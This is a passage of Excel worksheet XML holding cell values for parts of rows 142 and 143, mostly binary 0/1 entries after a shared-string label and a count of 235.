      </c>
      <c r="ES142">
        <v>0</v>
      </c>
      <c r="ET142">
        <v>0</v>
      </c>
      <c r="EU142">
        <v>0</v>
      </c>
      <c r="EV142">
        <v>0</v>
      </c>
      <c r="EW142">
        <v>0</v>
      </c>
      <c r="EX142">
        <v>0</v>
      </c>
      <c r="EY142">
        <v>0</v>
      </c>
      <c r="EZ142">
        <v>0</v>
      </c>
      <c r="FA142">
        <v>0</v>
      </c>
      <c r="FB142">
        <v>0</v>
      </c>
      <c r="FC142">
        <v>0</v>
      </c>
      <c r="FD142">
        <v>0</v>
      </c>
      <c r="FE142">
        <v>0</v>
      </c>
      <c r="FF142">
        <v>0</v>
      </c>
      <c r="FG142">
        <v>0</v>
      </c>
      <c r="FH142">
        <v>0</v>
      </c>
      <c r="FI142">
        <v>0</v>
      </c>
      <c r="FJ142">
        <v>0</v>
      </c>
      <c r="FK142">
        <v>0</v>
      </c>
      <c r="FL142">
        <v>0</v>
      </c>
      <c r="FM142">
        <v>0</v>
      </c>
      <c r="FN142">
        <v>0</v>
      </c>
      <c r="FO142">
        <v>0</v>
      </c>
      <c r="FP142">
        <v>0</v>
      </c>
      <c r="FQ142">
        <v>0</v>
      </c>
      <c r="FR142">
        <v>0</v>
      </c>
      <c r="FS142">
        <v>0</v>
      </c>
      <c r="FT142">
        <v>0</v>
      </c>
      <c r="FU142">
        <v>0</v>
      </c>
      <c r="FV142">
        <v>0</v>
      </c>
      <c r="FW142">
        <v>0</v>
      </c>
      <c r="FX142">
        <v>0</v>
      </c>
      <c r="FY142">
        <v>0</v>
      </c>
      <c r="FZ142">
        <v>0</v>
      </c>
      <c r="GA142">
        <v>0</v>
      </c>
      <c r="GB142">
        <v>0</v>
      </c>
      <c r="GC142">
        <v>0</v>
      </c>
      <c r="GD142">
        <v>0</v>
      </c>
      <c r="GE142">
        <v>0</v>
      </c>
      <c r="GF142">
        <v>0</v>
      </c>
      <c r="GG142">
        <v>0</v>
      </c>
      <c r="GH142">
        <v>0</v>
      </c>
      <c r="GI142">
        <v>0</v>
      </c>
      <c r="GJ142">
        <v>0</v>
      </c>
      <c r="GK142">
        <v>0</v>
      </c>
      <c r="GL142">
        <v>0</v>
      </c>
      <c r="GM142">
        <v>0</v>
      </c>
      <c r="GN142">
        <v>0</v>
      </c>
      <c r="GO142">
        <v>0</v>
      </c>
      <c r="GP142">
        <v>0</v>
      </c>
      <c r="GQ142">
        <v>0</v>
      </c>
      <c r="GR142">
        <v>0</v>
      </c>
      <c r="GS142">
        <v>0</v>
      </c>
      <c r="GT142">
        <v>0</v>
      </c>
      <c r="GU142">
        <v>0</v>
      </c>
      <c r="GV142">
        <v>0</v>
      </c>
      <c r="GW142">
        <v>0</v>
      </c>
      <c r="GX142">
        <v>0</v>
      </c>
      <c r="GY142">
        <v>0</v>
      </c>
      <c r="GZ142">
        <v>0</v>
      </c>
      <c r="HA142">
        <v>0</v>
      </c>
      <c r="HB142">
        <v>0</v>
      </c>
      <c r="HC142">
        <v>0</v>
      </c>
      <c r="HD142">
        <v>0</v>
      </c>
      <c r="HE142">
        <v>0</v>
      </c>
      <c r="HF142">
        <v>0</v>
      </c>
      <c r="HG142">
        <v>0</v>
      </c>
      <c r="HH142">
        <v>0</v>
      </c>
      <c r="HI142">
        <v>0</v>
      </c>
      <c r="HJ142">
        <v>0</v>
      </c>
      <c r="HK142">
        <v>0</v>
      </c>
      <c r="HL142">
        <v>0</v>
      </c>
      <c r="HM142">
        <v>0</v>
      </c>
      <c r="HN142">
        <v>0</v>
      </c>
      <c r="HO142">
        <v>0</v>
      </c>
      <c r="HP142">
        <v>0</v>
      </c>
      <c r="HQ142">
        <v>0</v>
      </c>
      <c r="HR142">
        <v>0</v>
      </c>
      <c r="HS142">
        <v>0</v>
      </c>
      <c r="HT142">
        <v>0</v>
      </c>
      <c r="HU142">
        <v>0</v>
      </c>
      <c r="HV142">
        <v>0</v>
      </c>
      <c r="HW142">
        <v>0</v>
      </c>
      <c r="HX142">
        <v>0</v>
      </c>
      <c r="HY142">
        <v>0</v>
      </c>
      <c r="HZ142">
        <v>0</v>
      </c>
      <c r="IA142">
        <v>0</v>
      </c>
      <c r="IB142">
        <v>0</v>
      </c>
      <c r="IC142">
        <v>0</v>
      </c>
      <c r="ID142">
        <v>0</v>
      </c>
      <c r="IE142">
        <v>0</v>
      </c>
      <c r="IF142">
        <v>0</v>
      </c>
      <c r="IG142">
        <v>0</v>
      </c>
      <c r="IH142">
        <v>0</v>
      </c>
      <c r="II142">
        <v>0</v>
      </c>
      <c r="IJ142">
        <v>0</v>
      </c>
      <c r="IK142">
        <v>0</v>
      </c>
      <c r="IL142">
        <v>0</v>
      </c>
      <c r="IM142">
        <v>0</v>
      </c>
      <c r="IN142">
        <v>0</v>
      </c>
      <c r="IO142">
        <v>0</v>
      </c>
      <c r="IP142">
        <v>0</v>
      </c>
      <c r="IQ142">
        <v>0</v>
      </c>
      <c r="IR142">
        <v>0</v>
      </c>
      <c r="IS142">
        <v>0</v>
      </c>
      <c r="IT142">
        <v>0</v>
      </c>
      <c r="IU142">
        <v>0</v>
      </c>
      <c r="IV142">
        <v>0</v>
      </c>
      <c r="IW142">
        <v>0</v>
      </c>
      <c r="IX142">
        <v>0</v>
      </c>
      <c r="IY142">
        <v>0</v>
      </c>
      <c r="IZ142">
        <v>0</v>
      </c>
      <c r="JA142">
        <v>0</v>
      </c>
      <c r="JB142">
        <v>0</v>
      </c>
      <c r="JC142">
        <v>0</v>
      </c>
      <c r="JD142">
        <v>0</v>
      </c>
      <c r="JE142">
        <v>0</v>
      </c>
      <c r="JF142">
        <v>0</v>
      </c>
      <c r="JG142">
        <v>0</v>
      </c>
      <c r="JH142">
        <v>0</v>
      </c>
      <c r="JI142">
        <v>0</v>
      </c>
      <c r="JJ142">
        <v>0</v>
      </c>
      <c r="JK142">
        <v>0</v>
      </c>
      <c r="JL142">
        <v>0</v>
      </c>
      <c r="JM142">
        <v>0</v>
      </c>
      <c r="JN142">
        <v>0</v>
      </c>
      <c r="JO142">
        <v>0</v>
      </c>
      <c r="JP142">
        <v>0</v>
      </c>
      <c r="JQ142">
        <v>0</v>
      </c>
      <c r="JR142">
        <v>0</v>
      </c>
      <c r="JS142">
        <v>0</v>
      </c>
      <c r="JT142">
        <v>0</v>
      </c>
      <c r="JU142">
        <v>0</v>
      </c>
      <c r="JV142">
        <v>0</v>
      </c>
      <c r="JW142">
        <v>0</v>
      </c>
      <c r="JX142">
        <v>0</v>
      </c>
      <c r="JY142">
        <v>0</v>
      </c>
      <c r="JZ142">
        <v>0</v>
      </c>
      <c r="KA142">
        <v>0</v>
      </c>
      <c r="KB142">
        <v>0</v>
      </c>
      <c r="KC142">
        <v>0</v>
      </c>
      <c r="KD142">
        <v>0</v>
      </c>
      <c r="KE142">
        <v>0</v>
      </c>
      <c r="KF142">
        <v>0</v>
      </c>
      <c r="KG142">
        <v>0</v>
      </c>
      <c r="KH142">
        <v>0</v>
      </c>
      <c r="KI142">
        <v>0</v>
      </c>
      <c r="KJ142">
        <v>0</v>
      </c>
      <c r="KK142">
        <v>0</v>
      </c>
      <c r="KL142">
        <v>0</v>
      </c>
      <c r="KM142">
        <v>0</v>
      </c>
      <c r="KN142">
        <v>0</v>
      </c>
      <c r="KO142">
        <v>0</v>
      </c>
      <c r="KP142">
        <v>0</v>
      </c>
      <c r="KQ142">
        <v>0</v>
      </c>
      <c r="KR142">
        <v>0</v>
      </c>
      <c r="KS142">
        <v>0</v>
      </c>
      <c r="KT142">
        <v>0</v>
      </c>
      <c r="KU142">
        <v>0</v>
      </c>
      <c r="KV142">
        <v>0</v>
      </c>
      <c r="KW142">
        <v>0</v>
      </c>
      <c r="KX142">
        <v>0</v>
      </c>
      <c r="KY142">
        <v>0</v>
      </c>
      <c r="KZ142">
        <v>0</v>
      </c>
      <c r="LA142">
        <v>0</v>
      </c>
      <c r="LB142">
        <v>0</v>
      </c>
      <c r="LC142">
        <v>0</v>
      </c>
      <c r="LD142">
        <v>0</v>
      </c>
      <c r="LE142">
        <v>0</v>
      </c>
      <c r="LF142">
        <v>0</v>
      </c>
      <c r="LG142">
        <v>0</v>
      </c>
      <c r="LH142">
        <v>0</v>
      </c>
      <c r="LI142">
        <v>0</v>
      </c>
      <c r="LJ142">
        <v>0</v>
      </c>
      <c r="LK142">
        <v>0</v>
      </c>
      <c r="LL142">
        <v>0</v>
      </c>
      <c r="LM142">
        <v>0</v>
      </c>
      <c r="LN142">
        <v>0</v>
      </c>
      <c r="LO142">
        <v>0</v>
      </c>
      <c r="LP142">
        <v>0</v>
      </c>
      <c r="LQ142">
        <v>0</v>
      </c>
      <c r="LR142">
        <v>0</v>
      </c>
      <c r="LS142">
        <v>0</v>
      </c>
      <c r="LT142">
        <v>0</v>
      </c>
      <c r="LU142">
        <v>0</v>
      </c>
      <c r="LV142">
        <v>0</v>
      </c>
      <c r="LW142">
        <v>0</v>
      </c>
      <c r="LX142">
        <v>0</v>
      </c>
      <c r="LY142">
        <v>0</v>
      </c>
      <c r="LZ142">
        <v>0</v>
      </c>
      <c r="MA142">
        <v>0</v>
      </c>
      <c r="MB142">
        <v>0</v>
      </c>
      <c r="MC142">
        <v>0</v>
      </c>
      <c r="MD142">
        <v>0</v>
      </c>
      <c r="ME142">
        <v>0</v>
      </c>
      <c r="MF142">
        <v>0</v>
      </c>
      <c r="MG142">
        <v>0</v>
      </c>
      <c r="MH142">
        <v>0</v>
      </c>
      <c r="MI142">
        <v>0</v>
      </c>
      <c r="MJ142">
        <v>0</v>
      </c>
      <c r="MK142">
        <v>0</v>
      </c>
      <c r="ML142">
        <v>0</v>
      </c>
      <c r="MM142">
        <v>0</v>
      </c>
      <c r="MN142">
        <v>1</v>
      </c>
      <c r="MO142">
        <v>0</v>
      </c>
      <c r="MP142">
        <v>0</v>
      </c>
      <c r="MQ142">
        <v>0</v>
      </c>
      <c r="MR142">
        <v>0</v>
      </c>
      <c r="MS142">
        <v>0</v>
      </c>
      <c r="MT142">
        <v>0</v>
      </c>
      <c r="MU142">
        <v>0</v>
      </c>
      <c r="MV142">
        <v>0</v>
      </c>
      <c r="MW142">
        <v>0</v>
      </c>
      <c r="MX142">
        <v>0</v>
      </c>
      <c r="MY142">
        <v>0</v>
      </c>
      <c r="MZ142">
        <v>0</v>
      </c>
      <c r="NA142">
        <v>0</v>
      </c>
      <c r="NB142">
        <v>0</v>
      </c>
      <c r="NC142">
        <v>0</v>
      </c>
      <c r="ND142">
        <v>0</v>
      </c>
      <c r="NE142">
        <v>0</v>
      </c>
      <c r="NF142">
        <v>0</v>
      </c>
      <c r="NG142">
        <v>0</v>
      </c>
      <c r="NH142">
        <v>0</v>
      </c>
      <c r="NI142">
        <v>0</v>
      </c>
      <c r="NJ142">
        <v>0</v>
      </c>
      <c r="NK142">
        <v>0</v>
      </c>
      <c r="NL142">
        <v>0</v>
      </c>
      <c r="NM142">
        <v>0</v>
      </c>
      <c r="NN142">
        <v>0</v>
      </c>
      <c r="NO142">
        <v>0</v>
      </c>
      <c r="NP142">
        <v>0</v>
      </c>
      <c r="NQ142">
        <v>0</v>
      </c>
      <c r="NR142">
        <v>0</v>
      </c>
      <c r="NS142">
        <v>0</v>
      </c>
      <c r="NT142">
        <v>0</v>
      </c>
      <c r="NU142">
        <v>0</v>
      </c>
      <c r="NV142">
        <v>0</v>
      </c>
      <c r="NW142">
        <v>0</v>
      </c>
      <c r="NX142">
        <v>0</v>
      </c>
      <c r="NY142">
        <v>0</v>
      </c>
      <c r="NZ142">
        <v>0</v>
      </c>
      <c r="OA142">
        <v>0</v>
      </c>
      <c r="OB142">
        <v>0</v>
      </c>
      <c r="OC142">
        <v>0</v>
      </c>
      <c r="OD142">
        <v>0</v>
      </c>
      <c r="OE142">
        <v>0</v>
      </c>
      <c r="OF142">
        <v>0</v>
      </c>
      <c r="OG142">
        <v>0</v>
      </c>
      <c r="OH142">
        <v>0</v>
      </c>
      <c r="OI142">
        <v>0</v>
      </c>
      <c r="OJ142">
        <v>0</v>
      </c>
      <c r="OK142">
        <v>0</v>
      </c>
      <c r="OL142">
        <v>0</v>
      </c>
      <c r="OM142">
        <v>0</v>
      </c>
      <c r="ON142">
        <v>0</v>
      </c>
      <c r="OO142">
        <v>0</v>
      </c>
      <c r="OP142">
        <v>0</v>
      </c>
      <c r="OQ142">
        <v>0</v>
      </c>
      <c r="OR142">
        <v>0</v>
      </c>
      <c r="OS142">
        <v>0</v>
      </c>
      <c r="OT142">
        <v>0</v>
      </c>
      <c r="OU142">
        <v>0</v>
      </c>
      <c r="OV142">
        <v>0</v>
      </c>
      <c r="OW142">
        <v>0</v>
      </c>
      <c r="OX142">
        <v>0</v>
      </c>
      <c r="OY142">
        <v>0</v>
      </c>
      <c r="OZ142">
        <v>0</v>
      </c>
      <c r="PA142">
        <v>0</v>
      </c>
      <c r="PB142">
        <v>0</v>
      </c>
      <c r="PC142">
        <v>0</v>
      </c>
      <c r="PD142">
        <v>0</v>
      </c>
      <c r="PE142">
        <v>0</v>
      </c>
      <c r="PF142">
        <v>0</v>
      </c>
      <c r="PG142">
        <v>0</v>
      </c>
      <c r="PH142">
        <v>0</v>
      </c>
      <c r="PI142">
        <v>0</v>
      </c>
      <c r="PJ142">
        <v>0</v>
      </c>
      <c r="PK142">
        <v>0</v>
      </c>
      <c r="PL142">
        <v>0</v>
      </c>
      <c r="PM142">
        <v>0</v>
      </c>
      <c r="PN142">
        <v>0</v>
      </c>
      <c r="PO142">
        <v>0</v>
      </c>
      <c r="PP142">
        <v>0</v>
      </c>
      <c r="PQ142">
        <v>0</v>
      </c>
      <c r="PR142">
        <v>0</v>
      </c>
      <c r="PS142">
        <v>0</v>
      </c>
      <c r="PT142">
        <v>0</v>
      </c>
      <c r="PU142">
        <v>0</v>
      </c>
      <c r="PV142">
        <v>0</v>
      </c>
      <c r="PW142">
        <v>0</v>
      </c>
      <c r="PX142">
        <v>0</v>
      </c>
      <c r="PY142">
        <v>0</v>
      </c>
      <c r="PZ142">
        <v>0</v>
      </c>
      <c r="QA142">
        <v>0</v>
      </c>
      <c r="QB142">
        <v>0</v>
      </c>
      <c r="QC142">
        <v>0</v>
      </c>
      <c r="QD142">
        <v>0</v>
      </c>
      <c r="QE142">
        <v>0</v>
      </c>
      <c r="QF142">
        <v>0</v>
      </c>
      <c r="QG142">
        <v>0</v>
      </c>
      <c r="QH142">
        <v>0</v>
      </c>
      <c r="QI142">
        <v>0</v>
      </c>
      <c r="QJ142">
        <v>0</v>
      </c>
      <c r="QK142">
        <v>0</v>
      </c>
      <c r="QL142">
        <v>0</v>
      </c>
      <c r="QM142">
        <v>0</v>
      </c>
      <c r="QN142">
        <v>0</v>
      </c>
      <c r="QO142">
        <v>0</v>
      </c>
      <c r="QP142">
        <v>0</v>
      </c>
      <c r="QQ142">
        <v>0</v>
      </c>
      <c r="QR142">
        <v>0</v>
      </c>
      <c r="QS142">
        <v>0</v>
      </c>
      <c r="QT142">
        <v>0</v>
      </c>
      <c r="QU142">
        <v>0</v>
      </c>
      <c r="QV142">
        <v>0</v>
      </c>
      <c r="QW142">
        <v>0</v>
      </c>
      <c r="QX142">
        <v>0</v>
      </c>
      <c r="QY142">
        <v>0</v>
      </c>
      <c r="QZ142">
        <v>0</v>
      </c>
      <c r="RA142">
        <v>0</v>
      </c>
      <c r="RB142">
        <v>0</v>
      </c>
      <c r="RC142">
        <v>0</v>
      </c>
      <c r="RD142">
        <v>0</v>
      </c>
      <c r="RE142">
        <v>0</v>
      </c>
      <c r="RF142">
        <v>0</v>
      </c>
      <c r="RG142">
        <v>0</v>
      </c>
      <c r="RH142">
        <v>0</v>
      </c>
      <c r="RI142">
        <v>0</v>
      </c>
      <c r="RJ142">
        <v>0</v>
      </c>
      <c r="RK142">
        <v>0</v>
      </c>
      <c r="RL142">
        <v>0</v>
      </c>
      <c r="RM142">
        <v>0</v>
      </c>
      <c r="RN142">
        <v>0</v>
      </c>
      <c r="RO142">
        <v>0</v>
      </c>
      <c r="RP142">
        <v>0</v>
      </c>
      <c r="RQ142">
        <v>0</v>
      </c>
      <c r="RR142">
        <v>0</v>
      </c>
      <c r="RS142">
        <v>0</v>
      </c>
      <c r="RT142">
        <v>0</v>
      </c>
      <c r="RU142">
        <v>0</v>
      </c>
      <c r="RV142">
        <v>0</v>
      </c>
      <c r="RW142">
        <v>0</v>
      </c>
      <c r="RX142">
        <v>0</v>
      </c>
      <c r="RY142">
        <v>0</v>
      </c>
      <c r="RZ142">
        <v>0</v>
      </c>
      <c r="SA142">
        <v>0</v>
      </c>
    </row>
    <row r="143" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A143" s="6" t="s">
        <v>4176</v>
      </c>
      <c r="B143">
        <v>235</v>
      </c>
      <c r="C143">
        <v>0</v>
      </c>
      <c r="D143">
        <v>0</v>
      </c>
      <c r="E143">
        <v>1</v>
      </c>
      <c r="F143">
        <v>0</v>
      </c>
      <c r="G143">
        <v>0</v>
      </c>
      <c r="H143">
        <v>0</v>
      </c>
      <c r="I143">
        <v>1</v>
      </c>
      <c r="J143">
        <v>1</v>
      </c>
      <c r="K143">
        <v>1</v>
      </c>
      <c r="L143">
        <v>0</v>
      </c>
      <c r="M143">
        <v>1</v>
      </c>
      <c r="N143">
        <v>0</v>
      </c>
      <c r="O143">
        <v>1</v>
      </c>
      <c r="P143">
        <v>1</v>
      </c>
      <c r="Q143">
        <v>1</v>
      </c>
      <c r="R143">
        <v>0</v>
      </c>
      <c r="S143">
        <v>1</v>
      </c>
      <c r="T143">
        <v>1</v>
      </c>
      <c r="U143">
        <v>0</v>
      </c>
      <c r="V143">
        <v>0</v>
      </c>
      <c r="W143">
        <v>1</v>
      </c>
      <c r="X143">
        <v>1</v>
      </c>
      <c r="Y143">
        <v>0</v>
      </c>
      <c r="Z143">
        <v>1</v>
      </c>
      <c r="AA143">
        <v>1</v>
      </c>
      <c r="AB143">
        <v>0</v>
      </c>
      <c r="AC143">
        <v>1</v>
      </c>
      <c r="AD143">
        <v>1</v>
      </c>
      <c r="AE143">
        <v>0</v>
      </c>
      <c r="AF143">
        <v>0</v>
      </c>
      <c r="AG143">
        <v>0</v>
      </c>
      <c r="AH143">
        <v>0</v>
      </c>
      <c r="AI143">
        <v>1</v>
      </c>
      <c r="AJ143">
        <v>1</v>
      </c>
      <c r="AK143">
        <v>0</v>
      </c>
      <c r="AL143">
        <v>1</v>
      </c>
      <c r="AM143">
        <v>0</v>
      </c>
      <c r="AN143">
        <v>1</v>
      </c>
      <c r="AO143">
        <v>1</v>
      </c>
      <c r="AP143">
        <v>1</v>
      </c>
      <c r="AQ143">
        <v>1</v>
      </c>
      <c r="AR143">
        <v>0</v>
      </c>
      <c r="AS143">
        <v>0</v>
      </c>
      <c r="AT143">
        <v>1</v>
      </c>
      <c r="AU143">
        <v>0</v>
      </c>
      <c r="AV143">
        <v>1</v>
      </c>
      <c r="AW143">
        <v>0</v>
      </c>
      <c r="AX143">
        <v>1</v>
      </c>
      <c r="AY143">
        <v>1</v>
      </c>
      <c r="AZ143">
        <v>0</v>
      </c>
      <c r="BA143">
        <v>1</v>
      </c>
      <c r="BB143">
        <v>1</v>
      </c>
      <c r="BC143">
        <v>0</v>
      </c>
      <c r="BD143">
        <v>1</v>
      </c>
      <c r="BE143">
        <v>0</v>
      </c>
      <c r="BF143">
        <v>1</v>
      </c>
      <c r="BG143">
        <v>1</v>
      </c>
      <c r="BH143">
        <v>0</v>
      </c>
      <c r="BI143">
        <v>0</v>
      </c>
      <c r="BJ143">
        <v>1</v>
      </c>
      <c r="BK143">
        <v>1</v>
      </c>
      <c r="BL143">
        <v>1</v>
      </c>
      <c r="BM143">
        <v>0</v>
      </c>
      <c r="BN143">
        <v>1</v>
      </c>
      <c r="BO143">
        <v>0</v>
      </c>
      <c r="BP143">
        <v>1</v>
      </c>
      <c r="BQ143">
        <v>0</v>
      </c>
      <c r="BR143">
        <v>1</v>
      </c>
      <c r="BS143">
        <v>1</v>
      </c>
      <c r="BT143">
        <v>0</v>
      </c>
      <c r="BU143">
        <v>0</v>
      </c>
      <c r="BV143">
        <v>1</v>
      </c>
      <c r="BW143">
        <v>1</v>
      </c>
      <c r="BX143">
        <v>1</v>
      </c>
      <c r="BY143">
        <v>0</v>
      </c>
      <c r="BZ143">
        <v>1</v>
      </c>
      <c r="CA143">
        <v>0</v>
      </c>
      <c r="CB143">
        <v>0</v>
      </c>
      <c r="CC143">
        <v>0</v>
      </c>
      <c r="CD143">
        <v>0</v>
      </c>
      <c r="CE143">
        <v>1</v>
      </c>
      <c r="CF143">
        <v>0</v>
      </c>
      <c r="CG143">
        <v>0</v>
      </c>
      <c r="CH143">
        <v>0</v>
      </c>
      <c r="CI143">
        <v>1</v>
      </c>
      <c r="CJ143">
        <v>0</v>
      </c>
      <c r="CK143">
        <v>0</v>
      </c>
      <c r="CL143">
        <v>1</v>
      </c>
      <c r="CM143">
        <v>1</v>
      </c>
      <c r="CN143">
        <v>1</v>
      </c>
      <c r="CO143">
        <v>1</v>
      </c>
      <c r="CP143">
        <v>1</v>
      </c>
      <c r="CQ143">
        <v>1</v>
      </c>
      <c r="CR143">
        <v>0</v>
      </c>
      <c r="CS143">
        <v>1</v>
      </c>
      <c r="CT143">
        <v>0</v>
      </c>
      <c r="CU143">
        <v>1</v>
      </c>
      <c r="CV143">
        <v>0</v>
      </c>
      <c r="CW143">
        <v>1</v>
      </c>
      <c r="CX143">
        <v>0</v>
      </c>
      <c r="CY143">
        <v>1</v>
      </c>
      <c r="CZ143">
        <v>0</v>
      </c>
      <c r="DA143">
        <v>1</v>
      </c>
      <c r="DB143">
        <v>1</v>
      </c>
      <c r="DC143">
        <v>1</v>
      </c>
      <c r="DD143">
        <v>0</v>
      </c>
      <c r="DE143">
        <v>0</v>
      </c>
      <c r="DF143">
        <v>1</v>
      </c>
      <c r="DG143">
        <v>0</v>
      </c>
      <c r="DH143">
        <v>0</v>
      </c>
      <c r="DI143">
        <v>1</v>
      </c>
      <c r="DJ143">
        <v>0</v>
      </c>
      <c r="DK143">
        <v>1</v>
      </c>
      <c r="DL143">
        <v>1</v>
      </c>
      <c r="DM143">
        <v>1</v>
      </c>
      <c r="DN143">
        <v>0</v>
      </c>
      <c r="DO143">
        <v>1</v>
      </c>
      <c r="DP143">
        <v>0</v>
      </c>
      <c r="DQ143">
        <v>1</v>
      </c>
      <c r="DR143">
        <v>0</v>
      </c>
      <c r="DS143">
        <v>1</v>
      </c>
      <c r="DT143">
        <v>0</v>
      </c>
      <c r="DU143">
        <v>0</v>
      </c>
      <c r="DV143">
        <v>1</v>
      </c>
      <c r="DW143">
        <v>0</v>
      </c>
      <c r="DX143">
        <v>1</v>
      </c>
      <c r="DY143">
        <v>0</v>
      </c>
      <c r="DZ143">
        <v>0</v>
      </c>
      <c r="EA143">
        <v>0</v>
      </c>
      <c r="EB143">
        <v>0</v>
      </c>
      <c r="EC143">
        <v>0</v>
      </c>
      <c r="ED143">
        <v>1</v>
      </c>
      <c r="EE143">
        <v>0</v>
      </c>
      <c r="EF143">
        <v>0</v>
      </c>
      <c r="EG143">
        <v>0</v>
      </c>
      <c r="EH143">
        <v>0</v>
      </c>
      <c r="EI143">
        <v>0</v>
      </c>
      <c r="EJ143">
        <v>0</v>
      </c>
      <c r="EK143">
        <v>0</v>
      </c>
      <c r="EL143">
        <v>0</v>
      </c>
      <c r="EM143">
        <v>0</v>
      </c>
      <c r="EN143">
        <v>0</v>
      </c>
      <c r="EO143">
        <v>0</v>
      </c>
      <c r="EP143">
        <v>0</v>
      </c>
      <c r="EQ143">
        <v>1</v>
      </c>
      <c r="ER143">
        <v>0</v>
      </c>
      <c r="ES143">
        <v>0</v>
      </c>
      <c r="ET143">
        <v>1</v>
      </c>
      <c r="EU143">
        <v>0</v>
      </c>
      <c r="EV143">
        <v>1</v>
      </c>
      <c r="EW143">
        <v>1</v>
      </c>
      <c r="EX143">
        <v>0</v>
      </c>
      <c r="EY143">
        <v>1</v>
      </c>
      <c r="EZ143">
        <v>0</v>
      </c>
      <c r="FA143">
        <v>1</v>
      </c>
      <c r="FB143">
        <v>0</v>
      </c>
      <c r="FC143">
        <v>1</v>
      </c>
      <c r="FD143">
        <v>0</v>
      </c>
      <c r="FE143">
        <v>0</v>
      </c>
      <c r="FF143">
        <v>1</v>
      </c>
      <c r="FG143">
        <v>0</v>
      </c>
      <c r="FH143">
        <v>0</v>
      </c>
      <c r="FI143">
        <v>0</v>
      </c>
      <c r="FJ143">
        <v>0</v>
      </c>
      <c r="FK143">
        <v>0</v>
      </c>
      <c r="FL143">
        <v>1</v>
      </c>
      <c r="FM143">
        <v>0</v>
      </c>
      <c r="FN143">
        <v>1</v>
      </c>
      <c r="FO143">
        <v>0</v>
      </c>
      <c r="FP143">
        <v>1</v>
      </c>
      <c r="FQ143">
        <v>0</v>
      </c>
      <c r="FR143">
        <v>1</v>
      </c>
      <c r="FS143">
        <v>1</v>
      </c>
      <c r="FT143">
        <v>1</v>
      </c>
      <c r="FU143">
        <v>0</v>
      </c>
      <c r="FV143">
        <v>1</v>
      </c>
      <c r="FW143">
        <v>1</v>
      </c>
      <c r="FX143">
        <v>1</v>
      </c>
      <c r="FY143">
        <v>1</v>
      </c>
      <c r="FZ143">
        <v>0</v>
      </c>
      <c r="GA143">
        <v>0</v>
      </c>
      <c r="GB143">
        <v>1</v>
      </c>
      <c r="GC143">
        <v>0</v>
      </c>
      <c r="GD143">
        <v>0</v>
      </c>
      <c r="GE143">
        <v>0</v>
      </c>
      <c r="GF143">
        <v>1</v>
      </c>
      <c r="GG143">
        <v>0</v>
      </c>
      <c r="GH143">
        <v>0</v>
      </c>
      <c r="GI143">
        <v>1</v>
      </c>
      <c r="GJ143">
        <v>0</v>
      </c>
      <c r="GK143">
        <v>1</v>
      </c>
      <c r="GL143">
        <v>1</v>
      </c>
      <c r="GM143">
        <v>0</v>
      </c>
      <c r="GN143">
        <v>1</v>
      </c>
      <c r="GO143">
        <v>1</v>
      </c>
      <c r="GP143">
        <v>1</v>
      </c>
      <c r="GQ143">
        <v>1</v>
      </c>
      <c r="GR143">
        <v>0</v>
      </c>
      <c r="GS143">
        <v>1</v>
      </c>
      <c r="GT143">
        <v>1</v>
      </c>
      <c r="GU143">
        <v>1</v>
      </c>
      <c r="GV143">
        <v>0</v>
      </c>
      <c r="GW143">
        <v>1</v>
      </c>
      <c r="GX143">
        <v>1</v>
      </c>
      <c r="GY143">
        <v>0</v>
      </c>
      <c r="GZ143">
        <v>1</v>
      </c>
      <c r="HA143">
        <v>1</v>
      </c>
      <c r="HB143">
        <v>1</v>
      </c>
      <c r="HC143">
        <v>0</v>
      </c>
      <c r="HD143">
        <v>1</v>
      </c>
      <c r="HE143">
        <v>1</v>
      </c>
      <c r="HF143">
        <v>0</v>
      </c>
      <c r="HG143">
        <v>1</v>
      </c>
      <c r="HH143">
        <v>1</v>
      </c>
      <c r="HI143">
        <v>0</v>
      </c>
      <c r="HJ143">
        <v>0</v>
      </c>
      <c r="HK143">
        <v>0</v>
      </c>
      <c r="HL143">
        <v>0</v>
      </c>
      <c r="HM143">
        <v>0</v>
      </c>
      <c r="HN143">
        <v>1</v>
      </c>
      <c r="HO143">
        <v>0</v>
      </c>
      <c r="HP143">
        <v>1</v>
      </c>
      <c r="HQ143">
        <v>0</v>
      </c>
      <c r="HR143">
        <v>1</v>
      </c>
      <c r="HS143">
        <v>0</v>
      </c>
      <c r="HT143">
        <v>0</v>
      </c>
      <c r="HU143">
        <v>0</v>
      </c>
      <c r="HV143">
        <v>1</v>
      </c>
      <c r="HW143">
        <v>0</v>
      </c>
      <c r="HX143">
        <v>0</v>
      </c>
      <c r="HY143">
        <v>0</v>
      </c>
      <c r="HZ143">
        <v>1</v>
      </c>
      <c r="IA143">
        <v>0</v>
      </c>
      <c r="IB143">
        <v>1</v>
      </c>
      <c r="IC143">
        <v>1</v>
      </c>
      <c r="ID143">
        <v>1</v>
      </c>
      <c r="IE143">
        <v>0</v>
      </c>
      <c r="IF143">
        <v>0</v>
      </c>
      <c r="IG143">
        <v>0</v>
      </c>
      <c r="IH143">
        <v>1</v>
      </c>
      <c r="II143">
        <v>0</v>
      </c>
      <c r="IJ143">
        <v>0</v>
      </c>
      <c r="IK143">
        <v>1</v>
      </c>
      <c r="IL143">
        <v>1</v>
      </c>
      <c r="IM143">
        <v>1</v>
      </c>
      <c r="IN143">
        <v>1</v>
      </c>
      <c r="IO143">
        <v>0</v>
      </c>
      <c r="IP143">
        <v>1</v>
      </c>
      <c r="IQ143">
        <v>1</v>
      </c>
      <c r="IR143">
        <v>0</v>
      </c>
      <c r="IS143">
        <v>1</v>
      </c>
      <c r="IT143">
        <v>0</v>
      </c>
      <c r="IU143">
        <v>1</v>
      </c>
      <c r="IV143">
        <v>1</v>
      </c>
      <c r="IW143">
        <v>0</v>
      </c>
      <c r="IX143">
        <v>1</v>
      </c>
      <c r="IY143">
        <v>1</v>
      </c>
      <c r="IZ143">
        <v>1</v>
      </c>
      <c r="JA143">
        <v>1</v>
      </c>
      <c r="JB143">
        <v>0</v>
      </c>
      <c r="JC143">
        <v>0</v>
      </c>
      <c r="JD143">
        <v>0</v>
      </c>
      <c r="JE143">
        <v>1</v>
      </c>
      <c r="JF143">
        <v>0</v>
      </c>
      <c r="JG143">
        <v>1</v>
      </c>
      <c r="JH143">
        <v>0</v>
      </c>
      <c r="JI143">
        <v>0</v>
      </c>
      <c r="JJ143">
        <v>0</v>
      </c>
      <c r="JK143">
        <v>0</v>
      </c>
      <c r="JL143">
        <v>0</v>
      </c>
      <c r="JM143">
        <v>1</v>
      </c>
      <c r="JN143">
        <v>0</v>
      </c>
